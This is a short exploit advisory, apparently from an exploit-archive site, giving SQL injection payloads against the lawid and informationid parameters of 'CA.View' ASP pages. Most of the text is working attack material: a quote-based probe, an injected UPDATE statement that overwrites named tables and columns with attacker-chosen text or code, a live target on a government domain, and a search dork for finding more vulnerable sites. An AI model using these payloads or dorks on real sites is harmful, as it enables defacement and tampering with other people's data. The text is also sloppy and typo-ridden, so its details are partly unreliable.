CA.View/view-law.asp/view-info.asp sql injection
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam all members thx 3APA3A
spec.note : "Live The Life"
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
1-) example.com/[patch]/view-law.asp?lawid=(sql methot)
1-) example.com/[patch]/view-info.asp?informationid=(sql methot)
2-) example.com/ca/view-law.asp?lawid=(sql methot)
2-) example.com/ca/view-info.asp?informationid=(sql methot)
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
3-) example.com/[patch]/view-law.asp?lawid=1'
3-) example.com/[patch]/view-info.asp?informationid=1'
4-) example.com/ca/view-law.asp?lawid=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
4-) example.com/ca/view-info.asp?informationid=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
#tbl(law) : tbllaw #tbl(info) :tblinformation
#column : lawdetail #column :title
#####################################################################################
demo site : www.mrd.go.th/home
google : inurl:/ac/view-law.asp?lawid or /AC/view-info.asp?informationid